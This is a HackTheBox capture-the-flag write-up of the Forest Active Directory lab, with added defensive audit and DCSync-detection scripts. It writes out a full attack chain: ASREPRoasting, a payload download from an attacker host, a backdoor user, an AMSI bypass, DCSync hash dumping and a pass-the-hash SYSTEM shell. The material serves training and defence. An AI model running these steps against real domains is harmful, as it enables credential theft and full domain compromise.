📋 This writeup is part of the Lainkusanagi OSCP Like List — a curated collection of machines recommended for OSCP preparation.

TL;DR
Forest is an Easy Windows Domain Controller running Exchange Server. Anonymous LDAP/null-session enumeration exposes the full domain user list, including a service account with Kerberos pre-authentication disabled. ASREPRoasting yields a crackable hash for svc-alfresco. That account sits inside the Account Operators group — which grants the ability to create new users and add them to most groups, including Exchange Windows Permissions. That group holds WriteDacl on the domain object, enabling a DCSync attack that dumps all NTLM hashes and delivers a SYSTEM shell via Pass-the-Hash.
Tools used: Nmap · enum4linux · Impacket (GetNPUsers, secretsdump, psexec) · Hashcat · Evil-WinRM · SharpHound · BloodHound · PowerView (Add-ObjectACL)
Introduction
Forest is a retired Easy-difficulty Windows machine on HackTheBox running a Domain Controller with Exchange Server installed. It demonstrates a well-known attack path that exploits the excessive privileges Exchange grants its service groups by default — a misconfiguration that existed in production environments for years and remains relevant in legacy AD deployments. The path from anonymous enumeration to full domain compromise is clean, logical, and deeply educational.
Machine: Forest
OS: Windows Server 2016
Difficulty: Easy
Domain: htb.local
IP: 10.129.95.210
Enumeration
Port Scanning
nmap -sCV --min-rate=5000 -p- -oN initialscan.txt -vv 10.129.95.210
Standard DC port profile — Kerberos, LDAP, SMB, WinRM all open. Nmap’s SMB scripts immediately identify the target:
Computer name: FOREST
Domain name: htb.local
FQDN: FOREST.htb.local
OS: Windows Server 2016 Standard 14393
Port 5985 (WinRM) being open is significant — any valid credential we find will likely give us a remote shell.
Null Session Enumeration with enum4linux
Forest allows anonymous (null) session binds to LDAP and SMB, which is an immediate red flag. Running enum4linux without credentials:
enum4linux -a 10.129.95.210 | tee enum4linux.txt
The output is verbose and rich. Key findings:
Full domain user list leaked anonymously:
Administrator, Guest, krbtgt, DefaultAccount
sebastien, lucinda, svc-alfresco, andy, mark, santi
Plus a large number of Exchange health mailbox and system accounts (SM_*, HealthMailbox*).
Group membership reveals the Exchange setup:
Exchange Trusted Subsystem → member of Exchange Windows Permissions
Service Accounts → member of Privileged IT Accounts
svc-alfresco → member of Service Accounts
The Exchange Windows Permissions group is a well-known privilege escalation vector in domains with Exchange installed — it holds WriteDacl on the domain object by default, which can be abused to grant DCSync rights.
Initial Foothold
ASREPRoasting — svc-alfresco
With the user list in hand, we test which accounts have Kerberos pre-authentication disabled using impacket-GetNPUsers:
impacket-GetNPUsers HTB/ -usersfile user.txt -no-pass -dc-ip 10.129.95.210
Only one account returns a hash:
$krb5asrep$23$svc-alfresco@HTB:[AS-REP HASH]
svc-alfresco has pre-authentication disabled, handing over an AS-REP hash without any credentials required.
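The condition that made svc-alfresco ASREPRoastable is a single bit in the account's userAccountControl attribute (DONT_REQ_PREAUTH, 0x400000). The following audit script is an added example, not code from the writeup: it decodes that attribute for a list of accounts and reports which enabled accounts expose an AS-REP. The input records are constructed here in the shape an LDAP query for sAMAccountName and userAccountControl would return; the values are made up, with svc-alfresco's set to mirror the writeup's finding.

```python
# Added example (not from the writeup): audit userAccountControl for accounts that
# do not require Kerberos pre-authentication. Records are constructed to look like
# an LDAP (sAMAccountName, userAccountControl) result set; no real domain data.

# userAccountControl bit flags (MS-ADTS / MS-SAMR constants)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

UAC_FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAG_NAMES.items() if value & bit]


def find_asreproastable(records):
    """Split accounts with DONT_REQ_PREAUTH into (exposed, disabled_but_flagged).

    Only enabled accounts actually hand out an AS-REP; the KDC refuses disabled
    ones. A disabled account with the flag set is still worth cleaning up,
    because re-enabling it silently re-exposes it, so it is reported separately.
    """
    exposed, disabled_but_flagged = [], []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE:
            disabled_but_flagged.append(rec["sAMAccountName"])
        else:
            exposed.append(rec["sAMAccountName"])
    return exposed, disabled_but_flagged


# Constructed sample data. svc-alfresco gets 0x410200 =
# NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH to mirror the finding;
# the other accounts and values are invented for the example.
SAMPLE_USERS = [
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},
    {"sAMAccountName": "sebastien", "userAccountControl": 0x10200},
    {"sAMAccountName": "lucinda", "userAccountControl": 0x200},
    {"sAMAccountName": "Guest", "userAccountControl": 0x10202},
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},  # flagged but disabled
]

if __name__ == "__main__":
    exposed, parked = find_asreproastable(SAMPLE_USERS)
    for name in exposed:
        uac = next(r["userAccountControl"] for r in SAMPLE_USERS if r["sAMAccountName"] == name)
        print(f"[!] {name}: pre-auth disabled ({', '.join(decode_uac(uac))})")
    for name in parked:
        print(f"[-] {name}: pre-auth disabled but account is disabled; clear the flag anyway")
```

Run against a real export, the same check is what `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}` answers on the domain side; the point of decoding the raw attribute is that it also surfaces the disabled-but-flagged accounts that a quick AS-REP probe would miss.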
Cracking the Hash
hashcat -m 18200 svc.hash /usr/share/wordlists/rockyou.txt
[AS-REP HASH]:[PASSWORD]
Status: Cracked
Credentials: svc-alfresco:[PASSWORD]
Shell via Evil-WinRM
Port 5985 is open. With valid credentials, logging in is straightforward:
evil-winrm -i 10.129.95.210 -u svc-alfresco -p '[PASSWORD]'
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
User Flag
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
[USER FLAG]
Privilege Escalation
BloodHound — Mapping the Path to Domain Admin
Uploading SharpHound to collect AD data from inside the WinRM session:
# Download SharpHound from attacker machine
iwr -uri http://10.10.14.32/SharpHound.ps1 -outfile sharp.ps1
Import-Module ./sharp.ps1
Invoke-Bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass '[PASSWORD]'
# Download the zip back to Kali
download 20240409092833_BloodHound.zip
Loading the data into BloodHound surfaces the attack path:
svc-alfresco → member of Service Accounts → member of Privileged IT Accounts → member of Account Operators
Account Operators is a built-in privileged group that allows its members to create domain user accounts and add users to most groups — crucially including Exchange Windows Permissions.
Exchange Windows Permissions holds WriteDacl on the domain object (htb.local), meaning any member can modify the domain's DACL — including granting themselves DCSync rights.
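What BloodHound is surfacing here is an ACE on the domain object. The script below is an added example, not code from the writeup or from PowerView, showing how a defender can audit that DACL for the two things that matter: control rights (WriteDacl, WriteOwner, GenericAll) that let a holder grant themselves DCSync, and the replication extended rights that are DCSync. The ACE records are constructed in the shape PowerView's Get-DomainObjectAcl -ResolveGUIDs output takes (identity, rights string, ACE type, extended-right GUID); the entries, including the Exchange Windows Permissions and hack ones, are made up to mirror the writeup's path. The allow-list of expected principals is an assumption for this example.

```python
# Added example (not from the writeup): audit the domain object's DACL for
# principals that hold DCSync, or the rights needed to grant it to themselves.
# ACE records are constructed in a PowerView-like shape; none come from a real domain.

# Extended-right GUIDs for directory replication (fixed schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Rights on the domain object that let the holder rewrite the DACL itself.
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner"}

# Assumed allow-list: principals expected to hold these rights on a healthy domain object.
EXPECTED_PRINCIPALS = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
    "HTB\\Domain Admins",
    "HTB\\Enterprise Admins",
    "HTB\\Domain Controllers",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
}

ALL_EXTENDED_RIGHTS = ("", "00000000-0000-0000-0000-000000000000")


def audit_domain_acl(aces, expected=EXPECTED_PRINCIPALS):
    """Return (principal, reason) for each allow ACE held by an unexpected principal
    that grants DCSync directly or the ability to grant it."""
    findings = []
    for ace in aces:
        if not ace["AceType"].startswith("AccessAllowed"):
            continue  # deny ACEs do not grant anything
        if ace["IdentityReference"] in expected:
            continue
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        control = rights & CONTROL_RIGHTS
        if control:
            findings.append((ace["IdentityReference"],
                             "control right: " + ", ".join(sorted(control))))
        elif "ExtendedRight" in rights:
            guid = ace.get("ObjectAceType", "").lower()
            if guid in REPLICATION_RIGHTS:
                findings.append((ace["IdentityReference"],
                                 "extended right: " + REPLICATION_RIGHTS[guid]))
            elif guid in ALL_EXTENDED_RIGHTS:
                # No object GUID means every extended right, replication included.
                findings.append((ace["IdentityReference"],
                                 "all extended rights (includes replication)"))
    return findings


# Constructed sample DACL for DC=htb,DC=local (made up for this example).
SAMPLE_ACES = [
    {"IdentityReference": "HTB\\Domain Admins", "ActiveDirectoryRights": "GenericAll",
     "AceType": "AccessAllowed", "ObjectAceType": ""},
    {"IdentityReference": "HTB\\Domain Controllers", "ActiveDirectoryRights": "ExtendedRight",
     "AceType": "AccessAllowedObject", "ObjectAceType": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"IdentityReference": "HTB\\Exchange Windows Permissions",
     "ActiveDirectoryRights": "WriteDacl, ReadProperty", "AceType": "AccessAllowed", "ObjectAceType": ""},
    {"IdentityReference": "HTB\\hack", "ActiveDirectoryRights": "ExtendedRight",
     "AceType": "AccessAllowedObject", "ObjectAceType": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"IdentityReference": "NT AUTHORITY\\Authenticated Users", "ActiveDirectoryRights": "ReadProperty",
     "AceType": "AccessAllowed", "ObjectAceType": ""},
]

if __name__ == "__main__":
    for principal, reason in audit_domain_acl(SAMPLE_ACES):
        print(f"[!] {principal}: {reason}")
```

The ordering of the checks matters: a principal with WriteDacl is reported even if it currently holds no replication right, because that is exactly the state Exchange Windows Permissions is in before the escalation. Reviewing this list on a schedule, and diffing it against the last run, catches both the standing misconfiguration and a freshly added backdoor ACE.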
Abusing Account Operators — Creating a Backdoor User
Since svc-alfresco is effectively an Account Operators member, a new user can be created and immediately added to the Exchange Windows Permissions group:
$pass = ConvertTo-SecureString "[PASSWORD]" -AsPlainText -Force
New-ADUser hack -AccountPassword $pass -Enabled $True
Add-ADGroupMember -Identity "Exchange Windows Permissions" -members hack
Confirming group membership:
net group "Exchange Windows Permissions"
# Members: hack ✓
Granting DCSync Rights via WriteDacl
Using PowerView’s Add-ObjectACL to write DS-Replication-Get-Changes-All (DCSync) rights for the hack account onto the domain object. First bypassing AMSI:
Bypass-4MSI
$cred = New-Object System.Management.Automation.PSCredential('htb\hack', $pass)
Add-ObjectACL -PrincipalIdentity hack -Credential $cred -Rights DCSync
hack now has the ability to replicate domain credentials — effectively DCSync rights.
DCSync — Dumping All Domain Hashes
From Kali, using impacket-secretsdump as the hack account:
impacket-secretsdump htb.local/hack@10.129.212.119 -just-dc
Password: [PASSWORD]
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:[NTLM HASH]
htb.local\svc-alfresco:1147:[NTLM HASH]
htb.local\sebastien:1145:[NTLM HASH]
htb.local\lucinda:1146:[NTLM HASH]
[... all domain hashes ...]
The Administrator’s NTLM hash is in hand.
Pass-the-Hash — SYSTEM Shell
impacket-psexec Administrator@10.129.212.119 -hashes [NTLM HASH]
C:\Windows\system32> whoami
nt authority\system
Root Flag
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
[ROOT FLAG]
Key Takeaways
1. Null session enumeration is a critical misconfiguration. The entire attack chain started with an unauthenticated user listing the full domain user base. LDAP anonymous bind and null SMB sessions should be disabled in any production AD environment. If an attacker can enumerate users without credentials, they can start attacking accounts immediately.
2. ASREPRoastable accounts are low-hanging fruit. Any account with Kerberos pre-authentication disabled hands over an offline-crackable hash to anyone who asks — no credentials required. This setting should be audited regularly. If a legacy application genuinely requires it, the account’s password must be extremely long and complex.
3. Exchange’s default permissions are dangerous. The Exchange Windows Permissions group holding WriteDacl on the domain object is a design decision Microsoft has since addressed, but countless environments still have it. Any Exchange deployment should be assessed for this path, and the group's domain-level rights should be explicitly audited and minimised.
4. Account Operators is a stealthy privilege escalation vector. This group is often overlooked because it doesn’t have obvious domain admin powers — but the ability to create users and add them to most groups is effectively the same thing when Exchange groups are involved. Membership in Account Operators should be treated as highly privileged.
5. DCSync requires no malware on the DC. The attack is carried out entirely remotely over the legitimate directory replication protocol (the DRSUAPI method shown in the secretsdump output above). There’s no binary to detect on the DC, no lateral movement event — just a replication request that looks like normal DC behaviour. Detecting DCSync requires monitoring for DS-Replication-Get-Changes-All permissions being granted to non-DC accounts, and alerting on replication requests from non-DC machines.
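The detection described in takeaway 5 comes down to one signal: a Security event 4662 on the domain object whose Properties field carries a replication extended-right GUID, raised by an account that is not a domain controller. The script below is an added example, not code from the writeup, that runs that logic over a few constructed log lines. The lines are written in a simplified one-line key=value form rather than the real EVTX/XML layout, and the account names, attribute GUID and DC list are made up for the example; the three replication GUIDs are the fixed schema values. Generating these events in the first place requires the Audit Directory Service Access subcategory to be enabled and a SACL on the domain object that audits control-access operations.

```python
# Added example (not from the writeup): flag DCSync-style replication requests
# in Security event 4662 records. Log lines are constructed in a simplified
# key=value form for the example; field names follow the real 4662 event.
import re

# Extended-right GUIDs for directory replication (fixed schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed allow-list of DC computer accounts; DC-to-DC replication is expected.
KNOWN_DCS = {"FOREST$"}

FIELD_RE = re.compile(r"(\w+)=([^\s{]+)")
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(line):
    """Parse one constructed key=value log line into a dict.

    Properties is handled separately because it can hold several {GUID} tokens.
    """
    fields = dict(FIELD_RE.findall(line))
    props = []
    if "Properties=" in line:
        props = [g.lower() for g in GUID_RE.findall(line.split("Properties=", 1)[1])]
    fields["Properties"] = props
    return fields


def detect_dcsync(lines, known_dcs=KNOWN_DCS):
    """Return (account, [replication rights used]) for every 4662 that exercises a
    replication right and is not raised by a known DC computer account."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        hits = [REPLICATION_RIGHTS[g] for g in ev["Properties"] if g in REPLICATION_RIGHTS]
        if not hits:
            continue  # ordinary directory access, not replication
        account = ev.get("SubjectUserName", "")
        if account.upper() in known_dcs:
            continue
        alerts.append((account, hits))
    return alerts


# Constructed sample log lines (not real events from the machine).
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: expected, no alert
    "EventID=4662 SubjectUserName=FOREST$ SubjectDomainName=HTB ObjectType=domainDNS "
    "AccessMask=0x100 Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # A user account pulling replication data: this is what DCSync looks like
    "EventID=4662 SubjectUserName=hack SubjectDomainName=HTB ObjectType=domainDNS "
    "AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # Ordinary attribute read on a user object (made-up attribute GUID): no alert
    "EventID=4662 SubjectUserName=lucinda SubjectDomainName=HTB ObjectType=user "
    "AccessMask=0x20 Properties={00000000-1111-2222-3333-444444444444}",
    # Unrelated event type: ignored
    "EventID=4624 SubjectUserName=hack SubjectDomainName=HTB LogonType=3",
]

if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"[!] possible DCSync by {account}: {', '.join(rights)}")
```

The same rule ported to a SIEM is: EventID 4662, Properties contains any of the three replication GUIDs, SubjectUserName not in the DC computer-account list. Pairing it with an alert on 4662/5136 events that add those GUIDs to the domain object's DACL catches the Add-ObjectACL step before the first replication request is ever made.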
Thanks for reading! Follow for more HackTheBox writeups covering Active Directory and Windows exploitation techniques.
HackTheBox — Forest (Easy Windows / Active Directory) was originally published in System Weakness on Medium.